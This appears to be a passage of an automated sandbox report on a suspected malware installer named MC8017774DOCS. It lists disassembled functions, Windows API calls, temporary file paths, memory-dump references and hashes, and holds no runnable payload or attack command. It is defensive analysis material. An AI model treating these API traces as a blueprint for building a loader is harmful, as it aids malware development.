                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                    • String ID: Tahoma
                                                                                                                                                    • API String ID: 3808545654-3580928618
                                                                                                                                                    • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                    • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                                                                                    • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                                    • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                                    Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                    • MulDiv.KERNEL32(0008A76C,00000064,0008A770), ref: 00402E3C
                                                                                                                                                    • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                                    Strings
                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                    • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                    • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                                                                                    • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                                                                                    • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                                                                                    Function 6E9B256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6E9B121B: GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 6E9B265B
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B2690
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                                    • Opcode ID: 19c859219f60fd53457f160ab4b182b55351e8451b6bb8efc9ce804dfd21718a
                                                                                                                                                    • Instruction ID: 05e3f7cef9edbcc7956439e18795972bc31495ec003c335b0f39c84c7435a498
                                                                                                                                                    • Opcode Fuzzy Hash: 19c859219f60fd53457f160ab4b182b55351e8451b6bb8efc9ce804dfd21718a
                                                                                                                                                    • Instruction Fuzzy Hash: E3319CB1918501EFCB15CFA8C898C6BBBBEEF9B308710492EF55187220E771D8159F25
                                                                                                                                                    Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                    • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                    • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                                                                                    • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                                                                                    • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                                                                                    Function 00402598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nse865B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp$C:\Users\user\AppData\Local\Temp\nse865B.tmp\System.dll
                                                                                                                                                    • API String ID: 3109718747-1633066113
                                                                                                                                                    • Opcode ID: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                                    • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                                                                                                    • Opcode Fuzzy Hash: 2806917471d26587652065b68c97e9d93b9fed1128aa7c726bb62807fa0de6fb
                                                                                                                                                    • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                                                                                                    Function 6E9B18DD Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeGlobal
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2979337801-0
                                                                                                                                                    • Opcode ID: 86a42715d581dd2618a3822b7be8c190e3796e442de30ad97d47c658b4801efa
                                                                                                                                                    • Instruction ID: d9200f89b4b60b30db2316c2f2c6ddc7779ed3c3c3a6d81c93a0bd710b1c4e20
                                                                                                                                                    • Opcode Fuzzy Hash: 86a42715d581dd2618a3822b7be8c190e3796e442de30ad97d47c658b4801efa
                                                                                                                                                    • Instruction Fuzzy Hash: BE51B132D1415ABB8B409FEB84845AFBABDEF87354B104A6AD410E3144D7B0FAC98F91
                                                                                                                                                    Function 6E9B2398 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B24DA
                                                                                                                                                      • Part of subcall function 6E9B122C: lstrcpynW.KERNEL32(00000000,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B123C
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6E9B2460
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6E9B247B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4216380887-0
                                                                                                                                                    • Opcode ID: 0a8690227c30689cc096dd70265e469136aa73573eefc256aa48c5c85856e9e2
                                                                                                                                                    • Instruction ID: cd472a0b2eaec2e3e7f1a7c7f5d9ac9a35b025742189d03f2547b087b4cabcb5
                                                                                                                                                    • Opcode Fuzzy Hash: 0a8690227c30689cc096dd70265e469136aa73573eefc256aa48c5c85856e9e2
                                                                                                                                                    • Instruction Fuzzy Hash: D441AAB0408705EFD714DFA6D844A6B77BDEF96714B00491DE946CBA80EB70E889CFA1
                                                                                                                                                    Function 6E9B1621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1639
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1640
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6E9B21F0,?,00000808), ref: 6E9B1654
                                                                                                                                                    • GetProcAddress.KERNEL32(6E9B21F0,00000000), ref: 6E9B165B
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6E9B1664
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1148316912-0
                                                                                                                                                    • Opcode ID: d23ca7fa27f7e4b64cac69f55150a959310bc0c86dfd521bb9f3063d505455b4
                                                                                                                                                    • Instruction ID: 40249aae6d1250208a1ab7ab97c0a04f9bc565d328a9e4db45fa64f1e76fe95e
                                                                                                                                                    • Opcode Fuzzy Hash: d23ca7fa27f7e4b64cac69f55150a959310bc0c86dfd521bb9f3063d505455b4
                                                                                                                                                    • Instruction Fuzzy Hash: B3F0ACB260A5387BDA2196B78C4CC9BBE9CDF8B6F5B110215F6289219086A19D01DBF1
                                                                                                                                                    Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                    • Opcode ID: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                    • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                                                                                    • Opcode Fuzzy Hash: 9f3e8361c5455c25eedd40ad678b741ea6618978e593034b97affd3e1747e9e4
                                                                                                                                                    • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                                                                                    Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                    • String ID: !
                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                    • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                    • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                                                                                    • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                                                                                    • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                                                                                    Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                    • wsprintfW.USER32 ref: 00404B65
                                                                                                                                                    • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                    • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                                                                                    • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                                                                                    • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
